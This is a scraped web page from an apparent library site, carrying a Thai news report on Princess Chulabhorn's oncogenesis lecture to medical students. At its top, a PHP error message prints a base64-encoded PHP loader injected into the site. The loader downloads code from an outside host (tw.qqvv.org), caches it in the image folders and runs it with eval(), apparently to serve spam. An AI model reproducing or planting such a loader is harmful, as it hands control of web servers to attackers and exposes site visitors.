Parse error: syntax error, unexpected '<' in data:text/html;base64,PD9waHAgJGZwdD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLihpc19kaXIoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2ltYWdlJyk/Jy9pbWFnZS8nOihpc19kaXIoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2ltYWdlcycpPycvaW1hZ2VzLyc6KGlzX2RpcigkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLicvaW1nJyk/Jy9pbWcvJzonLy50bXAvJykpKS4nYTMwMGQ0ZGU4ZmI5YmQ4MmFhNTViN2UyMDY2YTlkMjAnOyRkaXI9ZGlybmFtZSgkZnB0KTska3dkPVsnY24ubG9sJywnZ292LmxvbCcsJ29yZy5jZmQnLCdxcXZ2Lm9yZycsJ2NzZW84LmNvbSddOyR1cmw9J2h0dHA6Ly90dy5xcXZ2Lm9yZy90eHQvdHcudHh0JztmdW5jdGlvbiBja3coJGNudCwka3dkKXtmb3JlYWNoKCRrd2QgYXMgJGt3KXtpZihzdHJwb3MoJGNudCwka3cpIT09ZmFsc2Upe3JldHVybiB0cnVlO319cmV0dXJuIGZhbHNlO31mdW5jdGlvbiBmcmMoJHVybCl7JGNoaD1jdXJsX2luaXQoKTtjdXJsX3NldG9wdCgkY2hoLENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0KCRjaGgsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkY2hoLENVUkxPUFRfVElNRU9VVCwxMCk7Y3VybF9zZXRvcHQoJGNoaCxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLHRydWUpOyRkYXQ9Y3VybF9leGVjKCRjaGgpO2lmKGN1cmxfZXJybm8oJGNoaCkpeyRkYXQ9ZmFsc2U7fWN1cmxfY2xvc2UoJGNoaCk7cmV0dXJuICRkYXQ7fWZ1bmN0aW9uIGdjdCgkZnB0LCR1cmwsJGRpcil7aWYoIWlzX2RpcigkZGlyKSl7bWtkaXIoJGRpciwwNzc3LHRydWUpO31pZihmaWxlX2V4aXN0cygkZnB0KSYmKCh0aW1lKCktZmlsZW10aW1lKCRmcHQpKTwzNjAwKSl7JGNwcj1maWxlX2dldF9jb250ZW50cygkZnB0KTtyZXR1cm4gZ3p1bmNvbXByZXNzKCRjcHIpO31lbHNleyRjbnQ9ZnJjKCR1cmwpO2lmKCRjbnQhPT1mYWxzZSl7ZmlsZV9wdXRfY29udGVudHMoJGZwdCxnemNvbXByZXNzKCRjbnQpKTt9cmV0dXJuICRjbnQ7fX0kY250PWdjdCgkZnB0LCR1cmwsJGRpcik7aWYoY2t3KCRjbnQsJGt3ZCkpe2V2YWwoJGNudCk7fWVsc2V7JGNudD1mcmMoJHVybCk7aWYoJGNudCE9PWZhbHNlKXtmaWxlX3B1dF9jb250ZW50cygkZnB0LGd6Y29tcHJlc3MoJGNudCkpO2V2YWwoJGNudCk7fX0gPz4=(1) : eval()'d code on line 1
RDP Library

Admin RDP Library RDPB
08 Jan 2025

สมเด็จเจ้าฟ้าจุฬาภรณวลัยลักษณ์ฯ ทรงบรรยายพิเศษ การเกิดโรคมะเร็ง

ศาสตราจารย์ ดร. สมเด็จพระเจ้าน้องนางเธอ เจ้าฟ้าจุฬาภรณวลัยลักษณ์ อัครราชกุมารี กรมพระศรีสวางควัฒน วรขัตติยราชนารี เสด็จไปทรงบรรยายพิเศษ เรื่อง การเกิดโรคมะเร็ง พระราชทานแก่นักศึกษาหลักสูตรแพทยศาสตรบัณฑิต ชั้นปีที่ 3 คณะแพทยศาสตร์ศรีสวางควัฒน ราชวิทยาลัยจุฬาภรณ์ เป็นวันแรก

วันที่ 7 มกราคม 2568 เวลา 12.29 น. ศาสตราจารย์ ดร. สมเด็จพระเจ้าน้องนางเธอ เจ้าฟ้าจุฬาภรณวลัยลักษณ์ อัครราชกุมารี กรมพระศรีสวางควัฒน วรขัตติยราชนารี เสด็จไปยังอาคารคณะแพทยศาสตร์ศรีสวางควัฒน ราชวิทยาลัยจุฬาภรณ์ เขตหลักสี่ ทรงบรรยายพิเศษ เรื่อง การเกิดโรคมะเร็ง หรือ Oncogenesis พระราชทานแก่คณาจารย์ นักวิชาการ และนักศึกษาหลักสูตรแพทยศาสตรบัณฑิต ชั้นปีที่ 3 ของคณะแพทยศาสตร์ศรีสวางควัฒน รวม 64 คน เพื่อสร้างความรู้ความเข้าใจเกี่ยวกับองค์ประกอบพื้นฐานและความซับซ้อนของโรคมะเร็ง ซึ่งเป็นส่วนหนึ่งในรายวิชา จภพบ 3304 พัฒนาการ พันธุศาสตร์ และโรคมะเร็ง

เนื่องจากโรคมะเร็งเป็นสาเหตุสำคัญของการเสียชีวิตอันดับหนึ่งในประเทศไทย และมีแนวโน้มการเกิดอุบัติการณ์เพิ่มขึ้นอยู่ตลอด ปัจจัยหลักมาจากการดำเนินชีวิตของมนุษย์ที่เปลี่ยนแปลงไป ซึ่งวงการวิทยาศาสตร์การแพทย์ให้ความสำคัญกับการศึกษาค้นคว้า วิจัย พัฒนาด้านการตรวจวินิจฉัยและการรักษาโรค เพื่อลดอัตราการเสียชีวิตของผู้ป่วย ตั้งแต่ "กระบวนการและขั้นตอนของการเกิดมะเร็งและชีววิทยาของเซลล์มะเร็ง" ประกอบด้วยหลายขั้นตอน มีความซับซ้อนในตัวเอง

ยกตัวอย่างเช่น กลไกการเกิดมะเร็งจากสารเคมี โดย "ขั้นเริ่มต้น" เชื่อว่าสามารถแยกออกเป็น 2 รูปแบบ คือ กลไกที่ทำลายหรือเปลี่ยนแปลงดีเอ็นเอโดยตรง และทำให้เกิดการกลายพันธุ์ จนภายหลังกลายเป็นเซลล์มะเร็ง เช่น การเกิดมะเร็งจากสารอะฟลาท็อกซิน (Aflatoxin) ที่พบจากเชื้อราในเมล็ดธัญพืชชนิดต่างๆ และสารเอ็น-ไนโตรซามีน (N-nitrosamine) ที่พบในอาหาร เช่น ปลาร้า กะปิ และเครื่องดื่มบางชนิด

ส่วนกลไกที่ไม่ได้ทำลายดีเอ็นเอโดยตรงจะมีการทำปฏิกิริยาในระบบการควบคุมการแสดงออกของยีน นำไปสู่การเปลี่ยนแปลงและเกิดเป็นเซลล์มะเร็ง

เมื่อเข้าสู่ "ขั้นก่อตัว" เซลล์จะถูกกระตุ้นให้เพิ่มจำนวนมากขึ้น และเข้าสู่ "ขั้นกระจายตัว" ทั้งนี้ เซลล์มะเร็งมีลักษณะทางชีววิทยาที่สำคัญ คือการแบ่งตัวอย่างไม่หยุดยั้ง และการเปลี่ยนแปลงในโปรตีน ซึ่งระยะแรกเซลล์มะเร็งจะอยู่รวมกันในบริเวณที่เกิดความผิดปกติ หากตรวจพบในระยะนี้ จะมีโอกาสยับยั้งและรักษาให้หายได้

 

ปัจจุบัน คณะแพทยศาสตร์ศรีสวางควัฒน ราชวิทยาลัยจุฬาภรณ์ เป็นโรงเรียนแพทย์ลำดับที่ 23 ของไทย ได้รับการรับรองตามเกณฑ์มาตรฐานสากลของ World Federation for Medical Education โดยสถาบันรับรองมาตรฐานการศึกษาแพทยศาสตร์และแพทยสภา จัดการเรียนการสอนในหลักสูตรที่ทันสมัยทั้งในระดับปริญญาตรี โท และเอก เพื่อมุ่งผลิตบัณฑิตแพทย์ และบุคลากรทางการแพทย์ที่เป็นผู้นำด้านสุขภาพและการบริการทางการแพทย์ ที่มีความสามารถด้านการวิจัยและพัฒนานวัตกรรม เพื่อการพัฒนาประเทศอย่างยั่งยืน เป็นกำลังสำคัญของการพัฒนาประเทศชาติต่อไป

..........................................

 

ข้อมูลโดย ไทยรัฐออนไลน์ 7 ม.ค. 2568 20:30 น.